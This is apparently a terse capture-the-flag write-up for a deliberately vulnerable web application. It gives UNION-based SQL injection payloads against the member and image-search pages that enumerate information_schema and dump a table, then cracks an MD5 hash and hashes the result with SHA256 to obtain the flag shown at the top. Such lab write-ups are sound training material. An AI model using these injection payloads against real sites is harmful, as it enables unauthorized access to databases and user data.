f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188


go to /?page=member or /?page=searchimg

submit :
	- 1 AND 1=2 UNION SELECT column_name , 1 FROM information_schema.columns
	- 1 AND 1=2 UNION SELECT table_name , 1 FROM information_schema.columns
	- 1 AND 1=2 UNION SELECT table_schema, 1 FROM information_schema.tables

then 1 AND 1=2 UNION SELECT title, comment FROM Member_images.list_images

"If you read this just use this md5 decode lowercase then sha256 to win this flag ! : 1928e8083cf461a51303633093573c46"
password => 1928e8083cf461a51303633093573c46 => albatroz

albatroz => sha256 => f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188
